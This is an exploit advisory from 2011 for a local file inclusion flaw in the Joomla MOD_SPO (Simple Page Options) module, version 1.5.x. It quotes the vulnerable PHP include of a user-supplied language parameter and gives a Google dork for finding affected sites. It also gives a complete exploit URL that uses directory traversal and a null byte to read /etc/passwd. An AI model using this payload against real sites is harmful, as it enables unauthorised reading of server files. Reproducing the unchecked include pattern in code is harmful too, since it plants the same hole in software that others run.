Joomla Spo 1.5.x Local File Inclusion

`# Exploit Title: LFI Joomla Component MOD_SPO   
# Google Dork: inurl:MOD_SPO  
# Date: 15/07/2011  
# Author: Jbyte  
# Software Link: http://extensions.joomla.org/extensions/style-a-design/accessibility/5974  
# Version: 1.5.x   
# Tested on: Ubuntu 11.04, Windows xp  
  
  
This Component of joomla has LFI(Local File Inclusion) you may call files of the server.  
  
  
Vulnerable Code:  
  
$s_lang =& JRequest::getVar('spo_site_lang');  
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))  
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')  
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');  
  
  
Exploit  
  
http://www.example.com/home/modules/mod_spo/[email protected]&spo_f_email[0][email protected]&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se  
  
Visited: http://jbyte-security.blogspot.com/  
  
  
`